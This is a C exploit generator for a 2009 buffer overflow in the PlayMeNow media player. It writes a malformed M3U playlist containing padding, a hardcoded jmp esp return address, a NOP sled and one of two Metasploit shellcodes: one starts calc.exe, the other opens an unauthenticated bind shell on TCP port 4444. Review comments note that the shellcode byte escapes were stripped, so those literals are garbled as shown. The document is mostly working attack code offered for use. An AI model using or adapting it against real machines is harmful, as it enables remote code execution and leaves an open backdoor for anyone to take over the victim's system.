
# Title : PlayMeNow Malformed M3U Playlist File Buffer
# Published : 2009-12-19
# Author : Gr33nG0bL1n


/*
	[+] Vulnerability:			PlayMeNow Malformed M3U Playlist File Buffer Overflow 
	[+] Product:				PlayMeNow - media player.
	[+] Versions affected:		Tested with 7.3 and 7.4
	[+] Tested on:				Windows XP Professional with Service Pack 2
	[+] Author:					Gr33nG0bL1n
	[+] Software Link:			http://playmenow.gooofull.com/ 
	[+] Date:				19/12/2009
	[+] Usage:					Just choose your shellcode and open the created file(PlayMeNow_expl.m3u) with PlayMeNow.
	

Crash state with the file filled with a plain 'A' pattern (EIP fully overwritten with 0x41414141, and both ESP and EBP pointing into the pattern, so a "jmp esp" return address lands in attacker-controlled data):
			EAX 00000000
			ECX 7C80C755 kernel32.7C80C755
			EDX 00000000
			EBX 00000000
			ESP 0012F5B8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
			EBP 0012FAE8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
			ESI 00194810
			EDI 001A4600
			EIP 41414141
	
Final file layout used by the generator below:
			exploit : [A x 1040] +[EIP - jmp esp] + [Nops -20] + [Shellcode]
*/

#include<stdio.h>
#include<string.h>
#include<stdlib.h>
#include<windows.h>


/*
	windows/exec -- generated with Metasploit (http://www.metasploit.com)
	Encoder: x86/shikata_ga_nai
	EXITFUNC=thread, CMD=calc

	Launches calc.exe on the victim: the harmless proof-of-concept payload.

	NOTE(review): the backslashes of every \xNN escape were evidently stripped
	when this listing was extracted (compare the "rn" endings in the printf
	strings below). As shown, the literal holds the characters 'x','3','1',...
	rather than the bytes 0x31,0xc9,...; every "x" must be restored to "\x"
	before this compiles into the intended payload. Also note that
	sizeof(calc_shcode) includes the string literal's trailing NUL.
	The shikata_ga_nai decoder stub at the front rewrites itself in place, so
	the payload presumably needs to execute from writable memory (the stack
	here) -- confirm DEP is not enforced for the target process.
*/
char calc_shcode[] =	"x31xc9xdaxd4xb1x33xbdxecx71x94xdexd9x74x24xf4"
						"x5fx31x6fx15x03x6fx15x83x2bx75x76x2bx4fx9exff"
						"xd4xafx5fx60x5cx4ax6exb2x3ax1fxc3x02x48x4dxe8"
						"xe9x1cx65x7bx9fx88x8axccx2axefxa5xcdx9ax2fx69"
						"x0dxbcxd3x73x42x1exedxbcx97x5fx2axa0x58x0dxe3"
						"xafxcbxa2x80xedxd7xc3x46x7ax67xbcxe3xbcx1cx76"
						"xedxecx8dx0dxa5x14xa5x4ax16x25x6ax89x6ax6cx07"
						"x7ax18x6fxc1xb2xe1x5ex2dx18xdcx6fxa0x60x18x57"
						"x5bx17x52xa4xe6x20xa1xd7x3cxa4x34x7fxb6x1ex9d"
						"x7ex1bxf8x56x8cxd0x8ex31x90xe7x43x4axacx6cx62"
						"x9dx25x36x41x39x6execxe8x18xcax43x14x7axb2x3c"
						"xb0xf0x50x28xc2x5ax3exafx46xe1x07xafx58xeax27"
						"xd8x69x61xa8x9fx75xa0x8dx40x94x61xfbxe8x01xe0"
						"x46x75xb2xdex84x80x31xebx74x77x29x9ex71x33xed"
						"x72x0bx2cx98x74xb8x4dx89x16x5fxdex51xf7xfax66"
						"xf3x07";


/*
	windows/shell_bind_tcp -- generated with Metasploit (http://www.metasploit.com)
	Encoder: x86/shikata_ga_nai
	EXITFUNC=thread, LPORT=4444, RHOST=

	Binds a command shell to TCP port 4444 on the victim with no authentication:
	anyone who can reach that port gets the shell, so only use this on an
	isolated lab network (a reverse-connect payload is the usual safer choice).

	NOTE(review): the backslashes of every \xNN escape were evidently stripped
	when this listing was extracted; as shown, the literal is the text
	'x','3','1',... and not the bytes 0x31,0xc9,.... Every "x" must be restored
	to "\x" before this is the intended payload. sizeof(bind_shcode) includes
	the string literal's trailing NUL.
*/
char bind_shcode[] =	"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xf7"
						"x82xf8x80x83xebxfcxe2xf4x0bxe8x13xcdx1fx7bx07x7f"
						"x08xe2x73xecxd3xa6x73xc5xcbx09x84x85x8fx83x17x0b"
						"xb8x9ax73xdfxd7x83x13xc9x7cxb6x73x81x19xb3x38x19"
						"x5bx06x38xf4xf0x43x32x8dxf6x40x13x74xccxd6xdcxa8"
						"x82x67x73xdfxd3x83x13xe6x7cx8exb3x0bxa8x9exf9x6b"
						"xf4xaex73x09x9bxa6xe4xe1x34xb3x23xe4x7cxc1xc8x0b"
						"xb7x8ex73xf0xebx2fx73xc0xffxdcx90x0exb9x8cx14xd0"
						"x08x54x9exd3x91xeaxcbxb2x9fxf5x8bxb2xa8xd6x07x50"
						"x9fx49x15x7cxccxd2x07x56xa8x0bx1dxe6x76x6fxf0x82"
						"xa2xe8xfax7fx27xeax21x89x02x2fxafx7fx21xd1xabxd3"
						"xa4xd1xbbxd3xb4xd1x07x50x91xeaxe9xdcx91xd1x71x61"
						"x62xeax5cx9ax87x45xafx7fx21xe8xe8xd1xa2x7dx28xe8"
						"x53x2fxd6x69xa0x7dx2exd3xa2x7dx28xe8x12xcbx7exc9"
						"xa0x7dx2exd0xa3xd6xadx7fx27x11x90x67x8ex44x81xd7"
						"x08x54xadx7fx27xe4x92xe4x91xeax9bxedx7ex67x92xd0"
						"xaexabx34x09x10xe8xbcx09x15xb3x38x73x5dx7cxbaxad"
						"x09xc0xd4x13x7axf8xc0x2bx5cx29x90xf2x09x31xeex7f"
						"x82xc6x07x56xacxd5xaaxd1xa6xd3x92x81xa6xd3xadxd1"
						"x08x52x90x2dx2ex87x36xd3x08x54x92x7fx08xb5x07x50"
						"x7cxd5x04x03x33xe6x07x56xa5x7dx28xe8x07x08xfcxdf"
						"xa4x7dx2ex7fx27x82xf8x80";


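/* Offsets from the header comment: 1040 bytes reach the saved return address,
 * then 20 NOPs sit between it and the payload. */
enum { PAD_LEN = 1040, NOP_LEN = 20 };

/*
 * Write the crash-file body to fp:
 *   [PAD_LEN x 'A'] [4-byte saved-EIP overwrite] [NOP_LEN x 0x90] [shellcode]
 * Every write is checked. Returns 0 on success, -1 on the first failed write
 * (errno is left as stdio set it).
 */
static int write_payload(FILE *fp, const char *shellcode, size_t shellcode_len)
{
	/* Bytes exactly as they go into the file. Read little-endian this is
	 * 0x7C82385D, which the header comment describes as a "jmp esp" inside
	 * kernel32.dll on XP SP2; it is tied to that DLL build and must be
	 * re-located for any other target. */
	static const unsigned char ret_addr[4] = { 0x5D, 0x38, 0x82, 0x7C };
	size_t i;

	for (i = 0; i < PAD_LEN; i++) {
		if (fputc('A', fp) == EOF)	/* 0x41 filler up to the saved EIP */
			return -1;
	}
	if (fwrite(ret_addr, 1, sizeof ret_addr, fp) != sizeof ret_addr)
		return -1;
	for (i = 0; i < NOP_LEN; i++) {
		if (fputc(0x90, fp) == EOF)	/* NOP sled in front of the payload */
			return -1;
	}
	if (fwrite(shellcode, 1, shellcode_len, fp) != shellcode_len)
		return -1;
	return 0;
}

/*
 * Entry point: ask which payload to embed, then build PlayMeNow_expl.m3u in
 * the current directory. Exit status is 0 on success and 1 on bad input or
 * any I/O failure (the original exited 0 even when fopen failed).
 *
 * Changes from the original: scanf's result is checked; an option other than
 * 1/2 is rejected before any file is created (the original had no default
 * case, so it left an empty file behind and leaked the FILE handle); every
 * write and the final fclose are checked; the duplicated padding/EIP/NOP
 * sequence lives in one helper; the cosmetic system("cls") -- a shell spawn
 * just to clear the screen -- is dropped. The printf/fwrite escapes, whose
 * backslashes were stripped when this listing was extracted, are restored.
 */
int main(int argc, char *argv[])
{
	FILE *fp;
	const char *shellcode;
	size_t shellcode_len;
	const char *label;
	int sc_opt = 0;

	(void)argc;
	(void)argv;

	printf("\t. .. ...PlayMeNow 7.4 m3u File Buffer Overflow... .. .\r\n");
	printf("Usage:\r\n");
	printf("\t[1] execute calc.exe\n");
	printf("\t[2] execute bindshell LPORT=4444\n\n");
	printf("Choose shellcode: <1/2>\r\n");

	if (scanf("%d", &sc_opt) != 1) {
		fprintf(stderr, "[-] expected 1 or 2\n");
		return 1;
	}

	switch (sc_opt) {
	case 1:
		shellcode = calc_shcode;
		shellcode_len = sizeof calc_shcode - 1;	/* exclude the literal's NUL */
		label = "Calc.exe";
		break;
	case 2:
		/* This payload opens an unauthenticated listener on TCP 4444 on the
		 * victim; anyone who can reach that port gets the shell. */
		shellcode = bind_shcode;
		shellcode_len = sizeof bind_shcode - 1;
		label = "bindshell port 4444";
		break;
	default:
		fprintf(stderr, "[-] unknown option %d; choose 1 or 2\n", sc_opt);
		return 1;
	}

	/* Binary mode matters on Windows: text mode would rewrite any 0x0A byte. */
	fp = fopen("PlayMeNow_expl.m3u", "wb");
	if (fp == NULL) {
		perror("cannot open expl file!");
		return 1;
	}

	if (write_payload(fp, shellcode, shellcode_len) != 0) {
		perror("[-] write failed");
		fclose(fp);
		return 1;
	}
	if (fclose(fp) != 0) {	/* fclose flushes; a failure here means lost data */
		perror("[-] close failed");
		return 1;
	}

	printf("[+] PlayMeNow_expl.m3u Created\r\n");
	printf("[+] Shellcode: %s\r\n", label);
	printf("[+] Enjoy\r\n");
	printf("[+] Exploited By Gr33nG0bL1n\r\n");
	return 0;
}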